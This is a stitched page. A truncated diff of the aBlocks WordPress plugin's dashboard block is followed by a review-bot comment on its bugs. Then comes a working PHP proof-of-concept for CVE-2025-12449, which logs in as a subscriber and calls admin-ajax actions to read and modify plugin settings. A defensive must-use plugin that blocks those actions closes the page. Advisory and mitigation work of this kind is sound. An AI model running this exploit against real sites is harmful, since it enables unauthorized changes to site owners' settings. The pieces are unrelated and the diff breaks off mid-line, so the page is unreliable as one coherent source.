+			$this->get_breadcrumb_css( $attributes, 'Tablet' ),
+			$this->get_breadcrumb_css( $attributes, 'Mobile' )
+		);
+
+		$get_breadcrumb_css = $this->get_breadcrumb_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-breadcrumb li + li::before',
+			$get_breadcrumb_css,
+			$this->get_breadcrumb_css( $attributes, 'Tablet' ),
+			$this->get_breadcrumb_css( $attributes, 'Mobile' )
+		);
+
+		$get_content_css = $this->get_content_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-content',
+			$get_content_css,
+			$this->get_content_css( $attributes, 'Tablet' ),
+			$this->get_content_css( $attributes, 'Mobile' )
+		);
+
+		$get_content_hover_css = $this->get_content_hover_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-content:hover',
+			$get_content_hover_css,
+			$this->get_content_hover_css( $attributes, 'Tablet' ),
+			$this->get_content_hover_css( $attributes, 'Mobile' )
+		);
+
+		return $css_generator->generate_css();
+	}
+
+
+	public function get_setting_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['sidebarBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['sidebarBackground'] ) ? $attributes['sidebarBackground'] : '');
+		}
+
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['sidebarBorder'] ?? [], '', $device )
+		);
+	}
+
+	public function get_user_setting_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['userTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['userTextColor'] ) ? $attributes['userTextColor'] : '');
+		}
+		if ( ! empty( $attributes['sidebarUserBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['sidebarUserBackground'] ) ? $attributes['sidebarUserBackground'] : '');
+		}
+		$userTypographyGlobal = ! empty( $attributes['userTypographyGlobal'] ) ? $attributes['userTypographyGlobal'] : '';
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['userSidebarBorder'] ?? [], '', $device ),
+			Typography::get_css( $attributes['userTypography'], '', $device, $userTypographyGlobal ),
+		);
+	}
+
+	public function get_menu_list_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['menuListTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['menuListTextColor'] ) ? $attributes['menuListTextColor'] : '');
+		}
+		if ( ! empty( $attributes['menuListBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['menuListBackground'] ) ? $attributes['menuListBackground'] : '');
+		}
+
+		$userTypographyGlobal = ! empty( $attributes['userTypographyGlobal'] ) ? $attributes['userTypographyGlobal'] : '';
+
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['menuListBorder'] ?? [], '', $device ),
+			Dimensions::get_css( $attributes['menuListPadding'] ?? [], 'padding', $device ),
+			Typography::get_css( $attributes['menuListTypography'] ?? [], '', $device, $userTypographyGlobal )
+		);
+	}
+
+	public function get_menu_hover_list_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['menuListHoverTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['menuListHoverTextColor'] ) ? $attributes['menuListHoverTextColor'] : '');
+		}
+		if ( ! empty( $attributes['menuListHoverBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['menuListHoverBackground'] ) ? $attributes['menuListHoverBackground'] : '');
+		}
+
+		return array_merge(
+			$css,
+			Border::get_hover_css( $attributes['menuListBorder'] ?? [], '', $device )
+		);
+	}
+
+	public function get_menu_active_list_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['menuListActiveTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['menuListActiveTextColor'] ) ? $attributes['menuListActiveTextColor'] : '');
+		}
+		if ( ! empty( $attributes['menuListActiveBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['menuListActiveBackground'] ) ? $attributes['menuListActiveBackground'] : '');
+		}
+
+		return $css;
+	}
+	public function get_content_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['contentBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['contentBackground'] ) ? $attributes['contentBackground'] : '');
+		}
+
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['contentBorder'] ?? [], '', $device ),
+			Dimensions::get_css( $attributes['contentPadding'] ?? [], 'padding', $device ),
+		);
+	}
+	public function get_content_hover_css( $attributes, $device = '' ) {
+
+		return array_merge(
+			Border::get_hover_css( $attributes['contentBorder'] ?? [], '', $device ),
+		);
+	}
+
+	public function get_breadcrumb_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['breadcrumbColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['breadcrumbColor'] ) ? $attributes['breadcrumbColor'] : '');
+		}
+		$breadcrumbtTypographyGlobal = ! empty( $attributes['breadcrumbtTypographyGlobal'] ) ? $attributes['breadcrumbtTypographyGlobal'] : '';
+
+		return array_merge(
+			$css,
+			Typography::get_css( $attributes['breadcrumbtTypography'] ?? [], '', $device, $breadcrumbtTypographyGlobal )
+		);
+	}
+	public function get_wrapper_gap_css( $attributes, $device = '' ) {
+		$css = [];
+
+			$css['display'] = 'flex';
+		if ( $device === 'Tablet' ) {
+			$css['flex-direction'] = 'column';
+		} elseif ( $device === 'Mobile' ) {
+			$css['flex-direction'] = 'column';
+		} else {
+			$css['flex-direction'] = 'row';
+		}
+
+		if ( ! empty( $attributes['bothGap'] ) ) {
+			$css['gap'] = $attributes['bothGap'] . 'px';
+		}
+		return array_merge(
+			$css
+		);
+	}
+
+	// * Render the block content.
+	public function render_block_content( $attributes, $content, $block_instance ) {
+
+		global $wp;
+		global $wpdb;
+
+		$dashboard_page = isset( $attributes['dashboard_page'] ) && ! empty( $attributes['dashboard_page'] ) ? $attributes['dashboard_page'] : 'root';
+
+		$dashboard_pages = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		// print_r($dashboard_pages);
+		$breadcrumbs = [];
+		$breadcrumbs[] = [
+			'label' => __( 'Dashboard', 'ablocks' ),
+			'url'   => $this->get_frontend_dashboard_endpoint_url( '' ),
+		];
+		$current_slug = get_query_var( 'ablocks_dashboard_page', 'root' );
+
+		if ( $current_slug !== 'root' ) {
+			// Find the current page in the dashboard_pages array
+			foreach ( $dashboard_pages as $page ) {
+				if ( isset( $page['slug'] ) && $page['slug'] === $current_slug ) {
+					$breadcrumbs[] = [
+						'label' => $page['label'],
+						'url'   => isset( $page['permalink'] ) ? $page['permalink'] : $this->get_frontend_dashboard_endpoint_url( $page['slug'] ),
+					];
+					break;
+				}
+			}
+		}
+		?>
+		<div class="ablocks-frontend-dashboard-sidebar">
+			<div class="ablocks-frontend-dashboard-user">
+				<div id="ablocks-frontend-dashboard-user-avatar">
+					<?php echo get_avatar( get_current_user_id(), 96, '', wp_get_current_user()->display_name, [ 'loading' => 'lazy' ] ); ?>
+					<span class="ablocks-frontend-dashboard-user__label"><?php echo esc_html( wp_get_current_user()->display_name ); ?></span>
+				</div>
+			</div>
+			<ul class="ablocks-frontend-dashboard-menu">
+				<?php
+				foreach ( $dashboard_pages as $menu ) :
+					// print_r($menu);
+					$endpoint = $menu['slug'];
+					$menu['permalink'] = $menu['permalink'] ?? $menu['link'] ?? null;
+					if ( $endpoint === 'root' ) {
+						$menu['label'] = __( 'Dashboard', 'ablocks' );
+						$menu['slug']  = '';
+						$menu['priority'] = 0;
+					} ?>
+					<li class="ablocks-frontend-dashboard-menu__item ablocks-frontend-dashboard-menu__item--<?php echo esc_attr( $endpoint ); ?> <?php echo esc_attr( $menu['class_name'] ?? '' ); ?> <?php echo get_query_var( 'ablocks_dashboard_page' ) === $endpoint || ( get_query_var( 'ablocks_dashboard_page' ) === '' && 'index' === $endpoint ) ? 'ablocks-frontend-dashboard-menu__item--current' : ''; ?>">
+						<a href="<?php echo esc_url( isset( $menu['permalink'] ) ? $menu['permalink'] : $this->get_frontend_dashboard_endpoint_url( $endpoint ) ); ?>">
+							<i class="<?php if ( ! empty( $menu['icon'] ) ) {
+								echo esc_html( $menu['icon'] );} ?>"></i>
+							<span class="ablocks-frontend-dashboard-menu__item-label"><?php echo esc_html( $menu['label'] ); ?></span>
+						</a>
+
+						<?php if ( ! empty( $menu['children'] ) ) : ?>
+							<ul class="ablocks-frontend-dashboard-menu__submenu">
+								<?php foreach ( $menu['children'] as $child ) : ?>
+									<?php
+
+										$child['permalink'] = $child['permalink'] ?? $child['link'] ?? null;
+									?>
+									<li  clas="<?php echo esc_attr( $child['class_name'] ?? '' ); ?>"><a href="<?php echo esc_url( isset( $child['permalink'] ) ? $child['permalink'] : $this->get_frontend_dashboard_endpoint_url( $child['slug'] ) ); ?>">
+										<i class="<?php if ( ! empty( $child['icon'] ) ) {
+											echo esc_html( $child['icon'] );} ?>"></i>
+										<?php echo esc_html( $child['label'] ); ?>
+									</a></li>
+								<?php endforeach; ?>
+							</ul>
+						<?php endif; ?>
+					</li>
+				<?php endforeach; ?>
+			</ul>
+
+		</div>
+		<div class="ablocks-frontend-dashboard-content">
+			<!-- Breadcrumb -->
+			<ul class="ablocks-frontend-dashboard-breadcrumb">
+				<?php foreach ( $breadcrumbs as $crumb ) :
+					?>
+					<li>
+						<?php echo esc_html( $crumb['label'] ); ?>
+					</li>
+				<?php endforeach; ?>
+			</ul>
+			<?php
+			if ( Helper::is_gutenberg_editor() ) {
+				self::render_dashboard_page_by_slug( $dashboard_page );
+				// Show Notice for empty pages
+				if ( ! is_array( $dashboard_pages ) || ! count( $dashboard_pages ) ) {
+					echo 'Dashboard Page is empty. You haven't created any dashboar
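Review bot: In `render_block_content()`, the submenu item is emitted as `<li  clas="<?php echo esc_attr( $child['class_name'] ?? '' ); ?>">`, so the class never applies. The attribute name should be `class`. The icon class names are echoed inside `class="..."` with `esc_html()` where `esc_attr()` is the matching escaper. `$dashboard_pages` comes from `json_decode()` of an option and is iterated in two `foreach` loops before the `is_array()` check near the end, and `$menu['slug']`, `$menu['label']`, `$child['slug']` and `$child['label']` are read without `isset()`, so a malformed option value breaks the render. Validate the decoded structure once, directly after `json_decode()`. Smaller items: `get_menu_list_css()` passes `userTypographyGlobal` to the `menuListTypography` call, `global $wpdb` is unused, and the commented-out `print_r` calls should be removed.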

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12449 - aBlocks – WordPress Gutenberg Blocks <= 2.4.0 - Missing Authorization to Authenticated (Subscriber+) Settings Modification

<?php
/**
 * Proof of Concept for CVE-2025-12449
 * Demonstrates unauthorized access to aBlocks plugin settings
 * Requires valid WordPress subscriber credentials
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Get login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Extract nonce from login form (simplified - real implementation would parse HTML)
// For demonstration, we assume direct POST login works

// Step 2: Authenticate to WordPress
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Step 3: Exploit missing authorization to read plugin settings
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_payload = [
    'action' => 'get_settings'
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_payload));
$settings_response = curl_exec($ch);

echo "[+] Retrieved plugin settings:\n";
echo $settings_response . "\n\n";

// Step 4: Attempt to modify settings (example: change maintenance mode)
$modify_payload = [
    'action' => 'save_settings',
    'enabled_maintenance_page' => 'true',
    'maintenance_page' => '2',  // Page ID for maintenance page
    'mailchimp_api_key' => 'stolen_key_here'  // Would be modified in real attack
];

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($modify_payload));
$modify_response = curl_exec($ch);

echo "[+] Settings modification response:\n";
echo $modify_response . "\n\n";

// Step 5: Read block visibility settings
$visibility_payload = [
    'action' => 'get_blocks_visibility'
];

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($visibility_payload));
$visibility_response = curl_exec($ch);

echo "[+] Block visibility settings:\n";
echo $visibility_response . "\n";

curl_close($ch);
?>
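
The requests above succeed because the four AJAX actions run for any logged-in user. The defensive counterpart, as an added example that is not Atomic Edge's or the aBlocks project's code: a must-use plugin that rejects those actions for users without `manage_options` and logs the attempt. It assumes aBlocks registers its handlers at the default hook priority (10); the `ablocks-guard` log prefix and the variable names are made up for this example.

```php
<?php
/**
 * Plugin Name: aBlocks AJAX capability guard (added example)
 *
 * Stop-gap for CVE-2025-12449 on sites still running aBlocks <= 2.4.0.
 * Place in wp-content/mu-plugins/ so it loads before regular plugins.
 * Assumption: aBlocks hooks its handlers at the default priority (10),
 * so a callback at priority 0 on the same hook runs first.
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

// Action names as given in the advisory text. The advisory also mentions
// frontend dashboard actions but does not name them, so they are not listed.
$ablocks_guarded_actions = array(
	'get_settings',
	'save_settings',
	'get_blocks_visibility',
	'save_blocks_visibility',
);

foreach ( $ablocks_guarded_actions as $ablocks_action ) {
	add_action(
		'wp_ajax_' . $ablocks_action,
		static function () use ( $ablocks_action ) {
			if ( current_user_can( 'manage_options' ) ) {
				return; // Administrators fall through to the plugin's own handler.
			}
			// Leave a trail for detection: which account tried which action.
			$ip = isset( $_SERVER['REMOTE_ADDR'] )
				? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
				: '-';
			error_log(
				sprintf(
					'ablocks-guard: denied action=%s user_id=%d ip=%s',
					$ablocks_action,
					get_current_user_id(),
					$ip
				)
			);
			// wp_send_json_error() ends the request, so the later handler never runs.
			wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
		},
		0
	);
}
```

Denied requests show up in the PHP error log with the `ablocks-guard:` prefix, which gives a simple indicator to alert on; the file can be removed once the site runs the patched version 2.4.1.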
